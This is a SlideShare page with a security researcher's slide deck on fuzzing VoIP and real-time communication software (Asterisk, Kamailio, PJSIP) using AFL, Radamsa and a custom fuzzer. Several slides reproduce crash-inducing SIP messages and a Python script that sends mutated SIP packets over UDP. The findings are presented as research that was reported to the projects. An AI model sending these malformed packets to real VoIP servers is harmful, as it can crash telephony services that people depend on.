SlideShare une entreprise Scribd logo

A tale of two RTC fuzzing approaches

Sandro Gauci
Sandro Gauci

A presentation describing two different approaches that we took when making use of fuzzing to discover vulnerabilities in VoIP or Real-time communications software and libraries. We describe our failures and also our successful findings when using AFL and also our custom fuzzer, gasoline against Asterisk, Kamailio, PJSIP, RTP proxy and other solutions. Presentation can be found at https://www.youtube.com/watch?v=CuxKD5zljVI

Technologie
1  sur  41
Télécharger pour lire hors ligne
A tale of two RTC fuzzing approaches 1 / 41
Agenda 1. Introduction 2. First approach: instrumentation with AFL 3. Second approach: built a smart fuzzer 4. Conclusion 2 / 41
Introduction 3 / 41
About us and our story Sandro Gauci original author of SIPVicious Penetration Tester & Security Researcher behind Enable Security GmbH Alfred Farrugia often works with Enable Security enjoys building fuzzers and using them this is mostly his fault ;-) 4 / 41
Our story and aim of this presentation been fuzzing software as a side-project and also professionally for a while tried different approaches with RTC software aim is to describe our tests; both our failures and the few successes 5 / 41
Fuzzing RTC? What (wtf is fuzzing)? Fuzzing or fuzz testing is an automated software testing technique that involves providing invalid, unexpected, or random data as inputs to a computer program. The program is then monitored for exceptions such as crashes, or failing built-in code assertions or for finding potential memory leaks. Wikipedia 6 / 41
Why (bother with) RTC? Considered to be critical infrastructure Exposed to potential attackers Downtime causes major losses Not many people seem to be doing it 7 / 41
First approach Trying different experiments American Fuzzy Lop (AFL) looked particularly attractive 8 / 41
Why AFL? 9 / 41
Why AFL? 10 / 41
Why AFL? Uses very efficient techniques: compile-time instrumentation genetic algorithms is solid and widely used 11 / 41
How do you use AFL to fuzz RTC systems? AFL is great when fuzzing tools that take file input e.g. ffmpeg or tcpdump AFL is not so great when it comes to fuzzing anything that doesn't take file input (e.g. servers) Major hurdle is wiring the target code so that it can be fuzzed with AFL Example 1: Asterisk: due to its modular system, we had problems testing specific modules; we ended up copying whole code to be able to load the modules Example 2: Kamailio: easier to wire it for fuzzing, except that building it with the compile-time instrumentation for AFL was painful 12 / 41
Easy way out Fuzz what requires less effort! Libraries typically have a test harness Easier to isolate code that needs to be tested 13 / 41
How do you use AFL to fuzz RTC systems? Need a corpora .. INVITE sip:7170@iptel.org SIP/2.0 Via: SIP/2.0/UDP 195.37.77.100:5040; rport Max-Forwards: 10 From: <sip:jiri@iptel.org> To: <sip:jiri@bat.iptel.org> Call-ID: d10815e0-bf17-4afa-8412-d9130a793d96@213.20.128.35 CSeq: 2 INVITE Contact: <sip:213.20.128.35:9315> User-Agent: Windows RTC/1.0 Content-Type: application/sdp Content-Length: 451 ... 14 / 41
And a harness .. example with AFL and PJSIP Test tool from PJSIP's samples modified to use AFL persistent mode, based off pjsip- apps/src/samples/sipstateless.c static void init_media_type (pjsip_media_type * mt, char *type, char *subtype, char *boundary) { /* removed */ } int main (int argc, char *argv[]) { // initialization here pool = pjsip_endpt_create_pool (sip_endpt, NULL, 512, 512); init_media_type (&ctype, "multipart", "mixed", "12345"); while (__AFL_LOOP(1000)) { char testmsg[10240] = { 0 }; fread (testmsg, 1, 10240, stdin); pj_strdup2_with_null (pool, &str, testmsg); body = pjsip_multipart_parse (pool, str.ptr, str.slen, &ctype, 0); if (!body) { printf ("cannot be parsed!n"); } } } 15 / 41
Which created a message similar to this INVITE sip:2565551100@one.example.com SIP/2.0 Via: SIP/2.0/UDP sip.example.com;branch=7c337f30d7ce.1 From: "Alice, A," <sip:bob@example.com> To: Bob <sip:bob@example.com> Call-ID: 602214199@mouse.wonderland.com CSeq: 1 INVITE Contact: Alice <sip:alice@mouse.wonderland.com> content-type: multipart/mixed;`boundary=++ -- --++=AAA xxx --+ Note that the above SIP message only contains new lines (i.e. n) and no carriage returns (i.e. r). 16 / 41
Which led to this crash gdb --args asterisk -c .... Asterisk Ready. Program received signal SIGSEGV, Segmentation fault. [Switching to Thread 0x7fffd6b85700 (LWP 2625)] 0x00007ffff783fd4c in parse_multipart_part (pool=0x1dff930, start=0x7ffff0004359 "--++=Discussion of Mbone Engineering Issuesne=mbone@somewhere.com nc=IN IP4 224.2.0.1/127nt=0 0nm=audio 3456 RTP/AVP 0na=rtpmapt...n--+", len=18446744073709551615, pct=0x1dffd60) at ../src/pjsip/sip_multipart.c:435 435 while (p!=end && *p!='n') ++p; 17 / 41
AFL and Kamailio #include "core/parser/msg_parser.h" int main() { if (fuzz_init_memory() != 0) goto error; static char buf [maxsize] = {0}; struct sip_msg* msg; set_local_debug_level(-250); int i; for (i=0; i<maxsize; i++) buf[i] = 0; while (__AFL_LOOP(1000)) { msg=pkg_malloc(sizeof(struct sip_msg)); memset(msg,0, sizeof(struct sip_msg)); int len = read(0, buf, maxsize-2); buf[len] = 0 len += 1; buf[len] = 0; len += 1; str inb; inb.s = buf; inb.len = len; len = inb.len; msg->buf=buf; msg->len=len; if (parse_msg(buf,len, msg) == 0) { parse_headers(msg, HDR_FROM_F|HDR_TO_F|HDR_CALLID_F|HDR_CSEQ_F, 0); } free_sip_msg(msg); pkg_free(msg); } } 18 / 41
AFL and Kamailio No issues in Kamailio found when taking this approach 19 / 41
Alternative approach with Radamsa Radamsa is a test case generator for robustness testing, a.k.a. a fuzzer echo "aaa" | radamsa aaaa echo "aaa" | radamsa ːaaa echo "Fuzztron 2000" | radamsa --seed 4 Fuzztron 4294967296 echo "1 + (2 + (3 + 4))" | radamsa --seed 12 -n 4 1 + (2 + (2 + (3 + 4?) 1 + (2 + (3 +?4)) 18446744073709551615 + 4))) 1 + (2 + (3 + 170141183460469231731687303715884105727)) 20 / 41
Alternative approach with Radamsa using Radamsa with replay immediate result: CSeq issue in PJSIP 21 / 41
Alternative approach with Radamsa The following OPTIONS message reproduced: OPTIONS sip:localhost:5060 SIP/2.0 From: <sip:test@localhost> To: <sip:test2@localhost> Call-ID: aa@0000000000 CSeq: 0 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...AAA Via: SIP/2.0/UDP 195.37.78.177:5060 Contact: <sip:test@localhost> Content-Length: 0 22 / 41
Alternative approach with Radamsa Result: Asterisk Malloc Debugger Started (see /opt/asterisk/var/log/asterisk/mmlog)) Asterisk Ready. [Apr 11 23:52:41] NOTICE[18382]: res_pjsip/pjsip_distributor.c:536 log_failed_request: Request 'OPTIONS' from '<sip:test@localhost>' failed for '10.0.2.2:44779' (callid: aa@0000000000) - No matching endpoint found ^CAsterisk cleanly ending (0). Executing last minute cleanups == Destroying musiconhold processes == Manager unregistered action DBGet == Manager unregistered action DBPut == Manager unregistered action DBDel == Manager unregistered action DBDelTree WARNING: High fence violation of 0x7ff0640058d0 allocated at ../src/pj/pool_policy_malloc.c default_block_alloc() line 46 WARNING: Memory corrupted after free of 0x7ff064006970 allocated at AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA @0000000000$195.37.78.177:5060$ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAA...AAA$0$$aa@0000000000$195.37.78.177:5060$() line 1094795585 Segmentation fault 23 / 41
Script to produce this issue def radamsafuzz(input): p = Popen(['radamsa'], stdin=PIPE, stdout=PIPE) p.stdin.write(input) out, err = p.communicate() return out def register(_from, _to, callid, useragent, cseq, via, contact, contentlength): return 'REGISTER sip:voip.net:5060 SIP/2.0rn' + 'From: %srn' % _from + 'To: %srn' % _to + 'Call-ID: %srn' % callid + 'User-Agent: %srn' % useragent + 'CSeq: %srn' % cseq + 'Via: %srn' % via + 'Contact: %srn' % contact + 'Content-Length: %srn' % contentlength + 'rn' HOST = '10.0.2.15' PORT = 5060 while True: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.connect((HOST, PORT)) while v is None: fuzz_register[key] = radamsafuzz(fuzz_register[key]) dt = register(**fuzz_register) with open('payload/%i.raw' % ix, 'wb') as fout: fout.write(dt) s.sendall(dt) 24 / 41
More experiments with this alternative approach Little effort, worked surprisingly well Tried the same approach with Asterisk chan_skinny, did not get too far Similar issue with FreeSWITCH 25 / 41
chan_skinny couldn't be fuzzed 26 / 41
Reported back to Asterisk project Issued 3 advisories: Heap overflow in CSEQ header parsing affects Asterisk chan_pjsip and PJSIP Out of bound memory access in PJSIP multipart parser crashes Asterisk Asterisk Skinny memory exhaustion vulnerability leads to DoS 27 / 41
Second approach inspired by the CSeq finding in PJSIP smart fuzzer, one that knows the target protocols started building and ended up with two tools: estoolkit gasoline 28 / 41
Second approach: estoolkit build environments on top of docker quickly switch through different configurations e.g. ./run.sh 5.1.3 cli config/default and ./run.sh 5.1.3 gdb config/default gdb mode is especially useful 29 / 41
Second approach: gasoline the fuzzer agnostic to which mutation engine we use initial support for radamsa, zzuf added later minimal SIP and RTP library targeted towards fuzzing so we could actually create a call, a dialog, authenticate 30 / 41
What did we test? Asterisk with chan_sip .. no results Asterisk with pjsip rtpproxy .. only tested basic default config rtpengine .. only tested basic default config kamailio .. one finding; only tested basic default config voipmonitor (tip: enable the Live Sniffer) customer systems/code 31 / 41
Public ndings - Kamailio REGISTER sip:localhost:5060 SIP/2.0 Via: SIP/2.0/TCP 127.0.0.1:53497;branch=z9hG4bK0aa9ae17-25cb-4c3a-abc9-979ce5bee394 To: <sip:1@localhost:5060> From: Test <sip:2@localhost:5060>;tag=bk1RdYaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaRg Call-ID: 8b113457-c6a6-456a-be68-606686d93c38 Contact: sip:1@127.0.0.1:53497 Max-Forwards: 70 CSeq: 10086 REGISTER User-Agent: go SIP fuzzer/1 Content-Length: 0 32 / 41
Public ndings - Asterisk / PJSIP (1) SUBSCRIBE sip:3000@127.0.0.1:5060 SIP/2.0 To: <sip:3000@127.0.0.1:5060> From: Test <sip:3000@127.0.0.1:5060> Call-ID: 1627b84b-b57d-4256-a748-30d01d242199 CSeq: 2 SUBSCRIBE Via: SIP/2.0/TCP 172.17.0.1:10394;branch=z9hG4bK1627b84b-b57d-4256-a748-30d01d242199 Contact: <sip:3000@172.17.0.1> Accept: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Accept: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Accept: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (REPEAT ACCEPT FOR 50 TIMES) Event: message-summary Allow: Allow: SUBSCRIBE, NOTIFY, INVITE, ACK, CANCEL, BYE, REFER, INFO, OPTIONS, MESSAGE Authorization: Digest username="3000",realm="asterisk",nonce="1517181436/80170188d05f4af45b8530366c8e7e5e Content-Length: 0 33 / 41
Public ndings - Asterisk / PJSIP (2) INVITE sip:5678@127.0.0.1:5060 SIP/2.0 To: <sip:5678@127.0.0.1:5060> From: Test <sip:5678@127.0.0.1:5060> Call-ID: adc9caea-2d0a-40af-9de5-1dd21387e03a CSeq: 2 INVITE Via: SIP/2.0/UDP 172.17.0.1:10394;branch=z9hG4bKadc9caea-2d0a-40af-9de5-1dd21387e03a Contact: <sip:5678@172.17.0.1> Content-Type: application/sdp Content-Length: 228 v=0 o=- 1061502179 1061502179 IN IP4 172.17.0.1 s=Asterisk c=IN IP4 172.17.0.1 t=0 0 m=audio 17000 RTP/AVP 9 0 101 a=rtpmap:8 alaw/8000 a=rtpmap:0 PCMU/8000 a=rtpmap:101 telephone-event/8000 a=fmtpx00:101 0-16 a=sendrecv 34 / 41
Public ndings - Asterisk / PJSIP (3) INVITE sip:5678@127.0.0.1:5060 SIP/2.0 To: <sip:5678@127.0.0.1:5060> From: Test <sip:5678@127.0.0.1:5060> Call-ID: 5493d4c9-8248-4c26-a63c-ee74bcf3e1e8 CSeq: 2 INVITE Via: SIP/2.0/UDP 172.17.0.1:10394;branch=z9hG4bK5493d4c9-8248-4c26-a63c-ee74bcf3e1e8 Contact: <sip:5678@172.17.0.1> Content-Type: application/sdp Content-Length: 115 v=0 o=- 1061502179 1061502179 IN IP4 172.17.0.1 s=Asterisk c=IN IP4 172.17.0.2 m=audio 17002 RTP/AVP 4294967296 35 / 41
And also, issues that stop us from fuzzing Asterisk exhibited a crash when sending a repeated number of INVITE messages over TCP or TLS transport. We reported this as well. 36 / 41
Gasoline vs Kamailio, in action 37 / 41
What else and what is next? Also looking at other protocols, especially STUN / TURN Will probably look again at compile-time instrumentation / AFL / Libfuzzer approach Looking for non-crash vulnerabilities, e.g. authentication bypass dialplan bypass memory disclosure / leak vulnerabilities (similar to Heartbleed) 38 / 41
Conclusion AFL approach requires a lot of setting up and customizations Would be great if the developers would provide tools, samples and documentation to aid with this Some already are (I only know of non-RTC devs who do this) including fuzzing support See Google's OSS-Fuzz and it's ideal integration document The second approach allows us to do blackbox testing without access to source code Appears to be surprisingly effective 39 / 41
Conclusion - ideal integration Every fuzz target: Is maintained by code owners in their RCS (Git, SVN, etc). Is built with the rest of the tests - no bit rot! Has a seed corpus with good code coverage. Is continuously tested on the seed corpus with ASan/UBSan/MSan Is fast and has no OOMs Has a fuzzing dictionary, if applicable stolen from https://github.com/google/oss-fuzz/blob/master/docs/ideal_integration.md 40 / 41
Q&A ? Get in touch sandro at enablesecurity dot com https://enablesecurity.com https://sipvicious.pro && https://sipvicious.org @sandrogauci 41 / 41

Recommandé

The OpenSIPS security audit - OpenSIPS Summit - Sandro Gauci
The OpenSIPS security audit - OpenSIPS Summit - Sandro GauciThe OpenSIPS security audit - OpenSIPS Summit - Sandro Gauci
The OpenSIPS security audit - OpenSIPS Summit - Sandro GauciSandro Gauci
 
The various ways your RTC may be crushed
The various ways your RTC may be crushedThe various ways your RTC may be crushed
The various ways your RTC may be crushedSandro Gauci
 
Tools for Offensive RTC security. Introducing SIPVicious PRO and the demo ser...
Tools for Offensive RTC security. Introducing SIPVicious PRO and the demo ser...Tools for Offensive RTC security. Introducing SIPVicious PRO and the demo ser...
Tools for Offensive RTC security. Introducing SIPVicious PRO and the demo ser...Alan Quayle
 
Python programming course
Python programming coursePython programming course
Python programming coursetcpipguru
 
Future Internet Week - IPv6 the way forward: IPv6 and security from a user’s ...
Future Internet Week - IPv6 the way forward: IPv6 and security from a user’s ...Future Internet Week - IPv6 the way forward: IPv6 and security from a user’s ...
Future Internet Week - IPv6 the way forward: IPv6 and security from a user’s ...ir. Carmelo Zaccone
 
Overview Linux certification may 2014
Overview Linux certification may 2014Overview Linux certification may 2014
Overview Linux certification may 2014Emiel Brok
 
Zaccone Carmelo - IPv6 and security from a user’s point of view
Zaccone Carmelo - IPv6 and security from a user’s point of view Zaccone Carmelo - IPv6 and security from a user’s point of view
Zaccone Carmelo - IPv6 and security from a user’s point of view IPv6 Conference
 
Whitepaper rce cve_2017_9841 | Remote Code Execution Laravel
Whitepaper rce cve_2017_9841 | Remote Code Execution LaravelWhitepaper rce cve_2017_9841 | Remote Code Execution Laravel
Whitepaper rce cve_2017_9841 | Remote Code Execution LaravelChandan Singh Ghodela
 

Recommandé

The OpenSIPS security audit - OpenSIPS Summit - Sandro Gauci
The OpenSIPS security audit - OpenSIPS Summit - Sandro GauciThe OpenSIPS security audit - OpenSIPS Summit - Sandro Gauci
The OpenSIPS security audit - OpenSIPS Summit - Sandro GauciSandro Gauci
 
The various ways your RTC may be crushed
The various ways your RTC may be crushedThe various ways your RTC may be crushed
The various ways your RTC may be crushedSandro Gauci
 
Tools for Offensive RTC security. Introducing SIPVicious PRO and the demo ser...
Tools for Offensive RTC security. Introducing SIPVicious PRO and the demo ser...Tools for Offensive RTC security. Introducing SIPVicious PRO and the demo ser...
Tools for Offensive RTC security. Introducing SIPVicious PRO and the demo ser...Alan Quayle
 
Python programming course
Python programming coursePython programming course
Python programming coursetcpipguru
 
Future Internet Week - IPv6 the way forward: IPv6 and security from a user’s ...
Future Internet Week - IPv6 the way forward: IPv6 and security from a user’s ...Future Internet Week - IPv6 the way forward: IPv6 and security from a user’s ...
Future Internet Week - IPv6 the way forward: IPv6 and security from a user’s ...ir. Carmelo Zaccone
 
Overview Linux certification may 2014
Overview Linux certification may 2014Overview Linux certification may 2014
Overview Linux certification may 2014Emiel Brok
 
Zaccone Carmelo - IPv6 and security from a user’s point of view
Zaccone Carmelo - IPv6 and security from a user’s point of view Zaccone Carmelo - IPv6 and security from a user’s point of view
Zaccone Carmelo - IPv6 and security from a user’s point of view IPv6 Conference
 
Whitepaper rce cve_2017_9841 | Remote Code Execution Laravel
Whitepaper rce cve_2017_9841 | Remote Code Execution LaravelWhitepaper rce cve_2017_9841 | Remote Code Execution Laravel
Whitepaper rce cve_2017_9841 | Remote Code Execution LaravelChandan Singh Ghodela
 
.Net Hijacking to Defend PowerShell BSidesSF2017
.Net Hijacking to Defend PowerShell BSidesSF2017 .Net Hijacking to Defend PowerShell BSidesSF2017
.Net Hijacking to Defend PowerShell BSidesSF2017 Amanda Rousseau
 
Latency tracing in distributed Java applications
Latency tracing in distributed Java applicationsLatency tracing in distributed Java applications
Latency tracing in distributed Java applicationsConstantine Slisenka
 
WebRTC Live Q&A and Screen Capture session 3
WebRTC Live Q&A and Screen Capture session 3WebRTC Live Q&A and Screen Capture session 3
WebRTC Live Q&A and Screen Capture session 3Amir Zmora
 
Building a Video Encoding Pipeline at The New York Times
Building a Video Encoding Pipeline at The New York TimesBuilding a Video Encoding Pipeline at The New York Times
Building a Video Encoding Pipeline at The New York TimesMaxwell Dayvson Da Silva
 
What Can Reverse Engineering Do For You?
What Can Reverse Engineering Do For You?What Can Reverse Engineering Do For You?
What Can Reverse Engineering Do For You?Amanda Rousseau
 
Openshift v3-a-revolucao-dos-containers-3
Openshift v3-a-revolucao-dos-containers-3Openshift v3-a-revolucao-dos-containers-3
Openshift v3-a-revolucao-dos-containers-3Ricardo Martinelli de Oliveira
 
Network Programming: Data Plane Development Kit (DPDK)
Network Programming: Data Plane Development Kit (DPDK)Network Programming: Data Plane Development Kit (DPDK)
Network Programming: Data Plane Development Kit (DPDK)Andriy Berestovskyy
 
Direct Code Execution - LinuxCon Japan 2014
Direct Code Execution - LinuxCon Japan 2014Direct Code Execution - LinuxCon Japan 2014
Direct Code Execution - LinuxCon Japan 2014Hajime Tazaki
 
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...idsecconf
 
Humantalk Angers 14 Mars
Humantalk Angers 14 MarsHumantalk Angers 14 Mars
Humantalk Angers 14 MarsRémi Dubois
 
Dpdk applications
Dpdk applicationsDpdk applications
Dpdk applicationsVipin Varghese
 
IWAN Lab Guide
IWAN Lab GuideIWAN Lab Guide
IWAN Lab Guidejww330015
 
26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rules26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rulesFreddy Buenaño
 
Playing BBR with a userspace network stack
Playing BBR with a userspace network stackPlaying BBR with a userspace network stack
Playing BBR with a userspace network stackHajime Tazaki
 
200-301-demo.pdf
200-301-demo.pdf200-301-demo.pdf
200-301-demo.pdfCiscoExamDumpsarticl1
 
Cisco 200-301 Exam Dumps
Cisco 200-301 Exam DumpsCisco 200-301 Exam Dumps
Cisco 200-301 Exam DumpsCiscoExamDumpsarticl2
 
Cisco 200-301 Exam Dumps
Cisco 200-301 Exam DumpsCisco 200-301 Exam Dumps
Cisco 200-301 Exam DumpsCiscoExamDumpsarticl
 
20081114 Friday Food iLabt Bart Joris
20081114 Friday Food iLabt Bart Joris20081114 Friday Food iLabt Bart Joris
20081114 Friday Food iLabt Bart Jorisimec.archive
 
NUSE (Network Stack in Userspace) at #osio
NUSE (Network Stack in Userspace) at #osioNUSE (Network Stack in Userspace) at #osio
NUSE (Network Stack in Userspace) at #osioHajime Tazaki
 
Hardwear.io 2018 BLE Security Essentials workshop
Hardwear.io 2018 BLE Security Essentials workshopHardwear.io 2018 BLE Security Essentials workshop
Hardwear.io 2018 BLE Security Essentials workshopSlawomir Jasek
 
Security Monitoring with eBPF
Security Monitoring with eBPFSecurity Monitoring with eBPF
Security Monitoring with eBPFAlex Maestretti
 
Getting started with IPv6
Getting started with IPv6Getting started with IPv6
Getting started with IPv6Private
 

Contenu connexe

Tendances

.Net Hijacking to Defend PowerShell BSidesSF2017
.Net Hijacking to Defend PowerShell BSidesSF2017 .Net Hijacking to Defend PowerShell BSidesSF2017
.Net Hijacking to Defend PowerShell BSidesSF2017 Amanda Rousseau
 
Latency tracing in distributed Java applications
Latency tracing in distributed Java applicationsLatency tracing in distributed Java applications
Latency tracing in distributed Java applicationsConstantine Slisenka
 
WebRTC Live Q&A and Screen Capture session 3
WebRTC Live Q&A and Screen Capture session 3WebRTC Live Q&A and Screen Capture session 3
WebRTC Live Q&A and Screen Capture session 3Amir Zmora
 
Building a Video Encoding Pipeline at The New York Times
Building a Video Encoding Pipeline at The New York TimesBuilding a Video Encoding Pipeline at The New York Times
Building a Video Encoding Pipeline at The New York TimesMaxwell Dayvson Da Silva
 
What Can Reverse Engineering Do For You?
What Can Reverse Engineering Do For You?What Can Reverse Engineering Do For You?
What Can Reverse Engineering Do For You?Amanda Rousseau
 

Tendances (6)

.Net Hijacking to Defend PowerShell BSidesSF2017
.Net Hijacking to Defend PowerShell BSidesSF2017 .Net Hijacking to Defend PowerShell BSidesSF2017
.Net Hijacking to Defend PowerShell BSidesSF2017
 
Latency tracing in distributed Java applications
Latency tracing in distributed Java applicationsLatency tracing in distributed Java applications
Latency tracing in distributed Java applications
 
WebRTC Live Q&A and Screen Capture session 3
WebRTC Live Q&A and Screen Capture session 3WebRTC Live Q&A and Screen Capture session 3
WebRTC Live Q&A and Screen Capture session 3
 
Building a Video Encoding Pipeline at The New York Times
Building a Video Encoding Pipeline at The New York TimesBuilding a Video Encoding Pipeline at The New York Times
Building a Video Encoding Pipeline at The New York Times
 
What Can Reverse Engineering Do For You?
What Can Reverse Engineering Do For You?What Can Reverse Engineering Do For You?
What Can Reverse Engineering Do For You?
 
Openshift v3-a-revolucao-dos-containers-3
Openshift v3-a-revolucao-dos-containers-3Openshift v3-a-revolucao-dos-containers-3
Openshift v3-a-revolucao-dos-containers-3
 

Similaire à A tale of two RTC fuzzing approaches

Network Programming: Data Plane Development Kit (DPDK)
Network Programming: Data Plane Development Kit (DPDK)Network Programming: Data Plane Development Kit (DPDK)
Network Programming: Data Plane Development Kit (DPDK)Andriy Berestovskyy
 
Direct Code Execution - LinuxCon Japan 2014
Direct Code Execution - LinuxCon Japan 2014Direct Code Execution - LinuxCon Japan 2014
Direct Code Execution - LinuxCon Japan 2014Hajime Tazaki
 
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...idsecconf
 
Humantalk Angers 14 Mars
Humantalk Angers 14 MarsHumantalk Angers 14 Mars
Humantalk Angers 14 MarsRémi Dubois
 
IWAN Lab Guide
IWAN Lab GuideIWAN Lab Guide
IWAN Lab Guidejww330015
 
26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rules26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rulesFreddy Buenaño
 
Playing BBR with a userspace network stack
Playing BBR with a userspace network stackPlaying BBR with a userspace network stack
Playing BBR with a userspace network stackHajime Tazaki
 
20081114 Friday Food iLabt Bart Joris
20081114 Friday Food iLabt Bart Joris20081114 Friday Food iLabt Bart Joris
20081114 Friday Food iLabt Bart Jorisimec.archive
 
NUSE (Network Stack in Userspace) at #osio
NUSE (Network Stack in Userspace) at #osioNUSE (Network Stack in Userspace) at #osio
NUSE (Network Stack in Userspace) at #osioHajime Tazaki
 
Hardwear.io 2018 BLE Security Essentials workshop
Hardwear.io 2018 BLE Security Essentials workshopHardwear.io 2018 BLE Security Essentials workshop
Hardwear.io 2018 BLE Security Essentials workshopSlawomir Jasek
 
Security Monitoring with eBPF
Security Monitoring with eBPFSecurity Monitoring with eBPF
Security Monitoring with eBPFAlex Maestretti
 
Getting started with IPv6
Getting started with IPv6Getting started with IPv6
Getting started with IPv6Private
 
DPDK in Containers Hands-on Lab
DPDK in Containers Hands-on LabDPDK in Containers Hands-on Lab
DPDK in Containers Hands-on LabMichelle Holley
 
Network performance test plan_v0.3
Network performance test plan_v0.3Network performance test plan_v0.3
Network performance test plan_v0.3David Pasek
 
A Check of the Open-Source Project WinSCP Developed in Embarcadero C++ Builder
A Check of the Open-Source Project WinSCP Developed in Embarcadero C++ BuilderA Check of the Open-Source Project WinSCP Developed in Embarcadero C++ Builder
A Check of the Open-Source Project WinSCP Developed in Embarcadero C++ BuilderAndrey Karpov
 
Kernel Recipes 2014 - NDIV: a low overhead network traffic diverter
Kernel Recipes 2014 - NDIV: a low overhead network traffic diverterKernel Recipes 2014 - NDIV: a low overhead network traffic diverter
Kernel Recipes 2014 - NDIV: a low overhead network traffic diverterAnne Nicolas
 

Similaire à A tale of two RTC fuzzing approaches (20)

Network Programming: Data Plane Development Kit (DPDK)
Network Programming: Data Plane Development Kit (DPDK)Network Programming: Data Plane Development Kit (DPDK)
Network Programming: Data Plane Development Kit (DPDK)
 
Direct Code Execution - LinuxCon Japan 2014
Direct Code Execution - LinuxCon Japan 2014Direct Code Execution - LinuxCon Japan 2014
Direct Code Execution - LinuxCon Japan 2014
 
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
 
Humantalk Angers 14 Mars
Humantalk Angers 14 MarsHumantalk Angers 14 Mars
Humantalk Angers 14 Mars
 
Dpdk applications
Dpdk applicationsDpdk applications
Dpdk applications
 
IWAN Lab Guide
IWAN Lab GuideIWAN Lab Guide
IWAN Lab Guide
 
26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rules26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rules
 
Playing BBR with a userspace network stack
Playing BBR with a userspace network stackPlaying BBR with a userspace network stack
Playing BBR with a userspace network stack
 
200-301-demo.pdf
200-301-demo.pdf200-301-demo.pdf
200-301-demo.pdf
 
Cisco 200-301 Exam Dumps
Cisco 200-301 Exam DumpsCisco 200-301 Exam Dumps
Cisco 200-301 Exam Dumps
 
Cisco 200-301 Exam Dumps
Cisco 200-301 Exam DumpsCisco 200-301 Exam Dumps
Cisco 200-301 Exam Dumps
 
20081114 Friday Food iLabt Bart Joris
20081114 Friday Food iLabt Bart Joris20081114 Friday Food iLabt Bart Joris
20081114 Friday Food iLabt Bart Joris
 
NUSE (Network Stack in Userspace) at #osio
NUSE (Network Stack in Userspace) at #osioNUSE (Network Stack in Userspace) at #osio
NUSE (Network Stack in Userspace) at #osio
 
Hardwear.io 2018 BLE Security Essentials workshop
Hardwear.io 2018 BLE Security Essentials workshopHardwear.io 2018 BLE Security Essentials workshop
Hardwear.io 2018 BLE Security Essentials workshop
 
Security Monitoring with eBPF
Security Monitoring with eBPFSecurity Monitoring with eBPF
Security Monitoring with eBPF
 
Getting started with IPv6
Getting started with IPv6Getting started with IPv6
Getting started with IPv6
 
DPDK in Containers Hands-on Lab
DPDK in Containers Hands-on LabDPDK in Containers Hands-on Lab
DPDK in Containers Hands-on Lab
 
Network performance test plan_v0.3
Network performance test plan_v0.3Network performance test plan_v0.3
Network performance test plan_v0.3
 
A Check of the Open-Source Project WinSCP Developed in Embarcadero C++ Builder
A Check of the Open-Source Project WinSCP Developed in Embarcadero C++ BuilderA Check of the Open-Source Project WinSCP Developed in Embarcadero C++ Builder
A Check of the Open-Source Project WinSCP Developed in Embarcadero C++ Builder
 
Kernel Recipes 2014 - NDIV: a low overhead network traffic diverter
Kernel Recipes 2014 - NDIV: a low overhead network traffic diverterKernel Recipes 2014 - NDIV: a low overhead network traffic diverter
Kernel Recipes 2014 - NDIV: a low overhead network traffic diverter
 

Plus de Sandro Gauci

CommCon 2023 - WebRTC & Video Delivery application security - what could poss...
CommCon 2023 - WebRTC & Video Delivery application security - what could poss...CommCon 2023 - WebRTC & Video Delivery application security - what could poss...
CommCon 2023 - WebRTC & Video Delivery application security - what could poss...Sandro Gauci
 
TADSummit 2022 - How to bring your own RTC platform down
TADSummit 2022 - How to bring your own RTC platform downTADSummit 2022 - How to bring your own RTC platform down
TADSummit 2022 - How to bring your own RTC platform downSandro Gauci
 
Tools for offensive RTC Security: introducing SIPVicious PRO and the demo server
Tools for offensive RTC Security: introducing SIPVicious PRO and the demo serverTools for offensive RTC Security: introducing SIPVicious PRO and the demo server
Tools for offensive RTC Security: introducing SIPVicious PRO and the demo serverSandro Gauci
 
Bounty bout 0x01 - WebRTC edition
Bounty bout 0x01 - WebRTC editionBounty bout 0x01 - WebRTC edition
Bounty bout 0x01 - WebRTC editionSandro Gauci
 
Web Application Firewalls Detection, Bypassing And Exploitation
